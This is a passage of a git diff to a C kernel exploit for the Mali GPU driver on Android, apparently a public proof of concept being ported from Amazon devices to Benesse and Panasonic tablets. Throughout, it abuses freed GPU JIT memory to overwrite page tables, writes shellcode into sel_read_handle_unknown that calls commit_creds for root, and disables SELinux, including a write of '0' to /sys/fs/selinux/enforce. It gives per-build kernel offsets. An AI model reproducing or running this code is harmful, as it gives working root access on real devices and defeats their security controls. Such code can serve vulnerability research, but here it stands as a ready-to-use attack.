overwrite_addr + data_offset, data_offset); curr_overwrite_addr = overwrite_addr; write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type); usleep(300000); @@ -695,7 +659,10 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u } } + void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { +printf("write_func called with code_size = %llu\n", code_size); +usleep(300000); uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; uint64_t curr_overwrite_addr = 0; for (int i = 0; i < size; i++) { @@ -706,7 +673,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u for (uint64_t addr = base; addr < end; addr += 0x1000) { uint64_t overwrite_addr = set_addr_lv3(addr); if (curr_overwrite_addr != overwrite_addr) { - LOG("overwrite addr : %llx %llx\n", overwrite_addr + func_offset, func_offset); + LOG("write_func overwrite addr : %llx %llx\n", overwrite_addr + func_offset, func_offset); curr_overwrite_addr = overwrite_addr; for (int code = code_size - 1; code >= 0; code--) { write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); @@ -716,24 +683,45 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u } } } -/* + int run_enforce() { char result = '2'; + printf("run_enforce: before sleep\n"); sleep(3); + printf("run_enforce: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + printf("run_enforce: open\n"); read(enforce_fd, &result, 1); close(enforce_fd); LOG("result %d\n", result); return result; } -*/ -int run_enforce() { + +int run_enforce_write() { + char result = '0'; + sleep(3); + LOG("run_enforce_write before open %d\n", result); + int enforce_fd = open("/sys/fs/selinux/enforce", O_WRONLY); + LOG("run_enforce_write before write\n"); + write(enforce_fd, &result, 1); + LOG("run_enforce_write before close\n"); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +int run_enforce_un() { char result = '2'; + printf("run_enforce_un: before sleep\n"); sleep(3); - int enforce_fd = open("/sys/fs/selinux/reject_unknown", O_RDONLY); + printf("run_enforce_un: after sleep\n"); + int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY); + printf("run_enforce_un: open\n"); read(enforce_fd, &result, 1); + printf("run_enforce_un: after read\n"); close(enforce_fd); + printf("run_enforce_un: after close\n"); LOG("result %d\n", result); return result; } @@ -744,167 +732,82 @@ void select_offset() { int len = __system_property_get("ro.build.fingerprint", fingerprint); LOG("fingerprint: %s\n", fingerprint); - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7212/1333N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7212_1333; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7212_1333; - fixup_root_shell(INIT_CRED_7212_1333, COMMIT_CREDS_7212_1333, SEL_READ_HANDLE_UNKNOWN_7212_1333, ADD_INIT_7212_1333, ADD_COMMIT_7212_1333); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7216/1582N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7216_1582; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7216_1582; - fixup_root_shell(INIT_CRED_7216_1582, COMMIT_CREDS_7216_1582, SEL_READ_HANDLE_UNKNOWN_7216_1582, ADD_INIT_7216_1582, ADD_COMMIT_7216_1582); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7224/1752N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7224_1752; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7224_1752; - fixup_root_shell(INIT_CRED_7224_1752, COMMIT_CREDS_7224_1752, SEL_READ_HANDLE_UNKNOWN_7224_1752, ADD_INIT_7224_1752, ADD_COMMIT_7224_1752); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1853N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7229_1853; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1853; - fixup_root_shell(INIT_CRED_7229_1853, COMMIT_CREDS_7229_1853, SEL_READ_HANDLE_UNKNOWN_7229_1853, ADD_INIT_7229_1853, ADD_COMMIT_7229_1853); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1856N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7229_1856; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1856; - fixup_root_shell(INIT_CRED_7229_1856, COMMIT_CREDS_7229_1856, SEL_READ_HANDLE_UNKNOWN_7229_1856, ADD_INIT_7229_1856, ADD_COMMIT_7229_1856); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000; + fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2039N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7234_2039; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2039; - fixup_root_shell(INIT_CRED_7234_2039, COMMIT_CREDS_7234_2039, SEL_READ_HANDLE_UNKNOWN_7234_2039, ADD_INIT_7234_2039, ADD_COMMIT_7234_2039); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_01_001; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001; + fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2042N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7234_2042; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2042; - fixup_root_shell(INIT_CRED_7234_2042, COMMIT_CREDS_7234_2042, SEL_READ_HANDLE_UNKNOWN_7234_2042, ADD_INIT_7234_2042, ADD_COMMIT_7234_2042); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_04_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000; + fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2216N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_2216; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2216; - fixup_root_shell(INIT_CRED_7242_2216, COMMIT_CREDS_7242_2216, SEL_READ_HANDLE_UNKNOWN_7242_2216, ADD_INIT_7242_2216, ADD_COMMIT_7242_2216); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_01_11_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000; + fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2896N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_2896; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2896; - fixup_root_shell(INIT_CRED_7242_2896, COMMIT_CREDS_7242_2896, SEL_READ_HANDLE_UNKNOWN_7242_2896, ADD_INIT_7242_2896, ADD_COMMIT_7242_2896); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_00_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000; + fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2906N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_2906; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2906; - fixup_root_shell(INIT_CRED_7242_2906, COMMIT_CREDS_7242_2906, SEL_READ_HANDLE_UNKNOWN_7242_2906, ADD_INIT_7242_2906, ADD_COMMIT_7242_2906); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_01_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000; + fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3515N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_3515; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3515; - fixup_root_shell(INIT_CRED_7242_3515, COMMIT_CREDS_7242_3515, SEL_READ_HANDLE_UNKNOWN_7242_3515, ADD_INIT_7242_3515, ADD_COMMIT_7242_3515); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_004; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004; + fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3516N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7242_3516; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3516; - fixup_root_shell(INIT_CRED_7242_3516, COMMIT_CREDS_7242_3516, SEL_READ_HANDLE_UNKNOWN_7242_3516, ADD_INIT_7242_3516, ADD_COMMIT_7242_3516); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_005; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005; + fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7273/2625N:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7273_2625; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7273_2625; - fixup_root_shell(INIT_CRED_7273_2625, COMMIT_CREDS_7273_2625, SEL_READ_HANDLE_UNKNOWN_7273_2625, ADD_INIT_7273_2625, ADD_COMMIT_7273_2625); + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_01_03_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000; + fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000); return; } - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7279.2766N/0023253929472:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7279_2766; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7279_2766; - fixup_root_shell(INIT_CRED_7279_2766, COMMIT_CREDS_7279_2766, SEL_READ_HANDLE_UNKNOWN_7279_2766, ADD_INIT_7279_2766, ADD_COMMIT_7279_2766); + /* + if (1) { + //avc_deny = 0x321C64; // avc_denied.isra.6 + //selinux_enforcing_READ = 0x32CC2C ; // t sel_read_enforce + //selinux_enforcing_WRITE = 0x32E01C ; // t sel_read_enforce + selinux_enforcing = SELINUX_ENFORCING_neo; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo; + //fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_WRITE, 0x910FC000, 0x910CA108); + //fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108); + fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo); return; } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2877N/0023723719936:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7285_2877; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2877; - fixup_root_shell(INIT_CRED_7285_2877, COMMIT_CREDS_7285_2877, SEL_READ_HANDLE_UNKNOWN_7285_2877, ADD_INIT_7285_2877, ADD_COMMIT_7285_2877); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2880N/0023723720704:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7285_2880; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2880; - fixup_root_shell(INIT_CRED_7285_2880, COMMIT_CREDS_7285_2880, SEL_READ_HANDLE_UNKNOWN_7285_2880, ADD_INIT_7285_2880, ADD_COMMIT_7285_2880); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2982N/0024126400000:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7292_2982; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2982; - fixup_root_shell(INIT_CRED_7292_2982, COMMIT_CREDS_7292_2982, SEL_READ_HANDLE_UNKNOWN_7292_2982, ADD_INIT_7292_2982, ADD_COMMIT_7292_2982); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2984N/0024126400512:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7292_2984; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2984; - fixup_root_shell(INIT_CRED_7292_2984, COMMIT_CREDS_7292_2984, SEL_READ_HANDLE_UNKNOWN_7292_2984, ADD_INIT_7292_2984, ADD_COMMIT_7292_2984); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7603.3110N/0025065956864:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7603_3110; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7603_3110; - fixup_root_shell(INIT_CRED_7603_3110, COMMIT_CREDS_7603_3110, SEL_READ_HANDLE_UNKNOWN_7603_3110, ADD_INIT_7603_3110, ADD_COMMIT_7603_3110); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7608.3614N/0025468739072:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7608_3614; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7608_3614; - fixup_root_shell(INIT_CRED_7608_3614, COMMIT_CREDS_7608_3614, SEL_READ_HANDLE_UNKNOWN_7608_3614, ADD_INIT_7608_3614, ADD_COMMIT_7608_3614); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7614.3227N/0025938402048:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7614_3227; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7614_3227; - fixup_root_shell(INIT_CRED_7614_3227, COMMIT_CREDS_7614_3227, SEL_READ_HANDLE_UNKNOWN_7614_3227, ADD_INIT_7614_3227, ADD_COMMIT_7614_3227); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7624_3337; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; - fixup_root_shell(INIT_CRED_7624_3337, COMMIT_CREDS_7624_3337, SEL_READ_HANDLE_UNKNOWN_7624_3337, ADD_INIT_7624_3337, ADD_COMMIT_7624_3337); - return; - } - - if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7633.3445N/0027347744000:user/amz-p,release-keys")) { - selinux_enforcing = SELINUX_ENFORCING_7633_3445; - sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7633_3445; - fixup_root_shell(INIT_CRED_7633_3445, COMMIT_CREDS_7633_3445, SEL_READ_HANDLE_UNKNOWN_7633_3445, ADD_INIT_7633_3445, ADD_COMMIT_7633_3445); - return; - } - + */ err(1, "unable to match build id\n"); } @@ -916,14 +819,13 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - usleep(100000); + usleep(300000); //Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { -/* - uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; +/* uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(100000); @@ -932,14 +834,26 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved //Triggers avc_denied to disable SELinux open("/dev/kmsg", O_RDONLY); -*/ - uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + */ + //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + //printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr); + + uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - //Call commit_creds to overwrite process credentials to gain root - write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + + // Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); } + void spray(int mali_fd) { for (int j = 0; j < SPRAY_NUM; j++) { union kbase_ioctl_mem_alloc alloc = {0}; @@ -973,7 +887,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { err(1, "gpu_alloc_region mmap failed"); } uint64_t jit_pages = SPRAY_PAGES; - uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); atom_number++; mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); @@ -995,7 +909,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { release_mem_pool(mali_fd, drain); printf("release_mem_pool\n"); jit_free(mali_fd, atom_number, jit_id); - + printf("reserve pages here\n"); reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); LOG("jit_freed\n"); @@ -1009,8 +923,13 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { LOG("Found pgd %d, %llx\n", pgd_idx, pgd); atom_number++; write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); + usleep(100000); write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + usleep(100000); + printf("time to run_enforce\n"); run_enforce(); + run_enforce_un(); + //run_enforce_write(); cleanup(mali_fd, pgd); return 0; } diff --git a/midgard.h b/midgard.h index e0ce432..d05cf25 100644 --- a/midgard.h +++ b/midgard.h @@ -1,7 +1,7 @@ #ifndef MIDGARD_H #define MIDGARD_H -//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone +// Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone #include #include @@ -41,7 +41,7 @@ __gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) { uint64_t val = 0; const int width = end - start + 1; - const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1); for (int byte = start / 8; byte <= end / 8; byte++) { val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); @@ -64,13 +64,13 @@ enum mali_job_type { }; enum mali_write_value_type { - MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, - MALI_WRITE_VALUE_TYPE_ZERO = 3, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, }; @@ -240,7 +240,7 @@ struct mali_write_value_job_packed { uint32_t opaque[14]; }; -#define MALI_JOB_HEADER_header \ +#define MALI_JOB_HEADER_header \ .is_64b = true #define MALI_WRITE_VALUE_JOB_LENGTH 56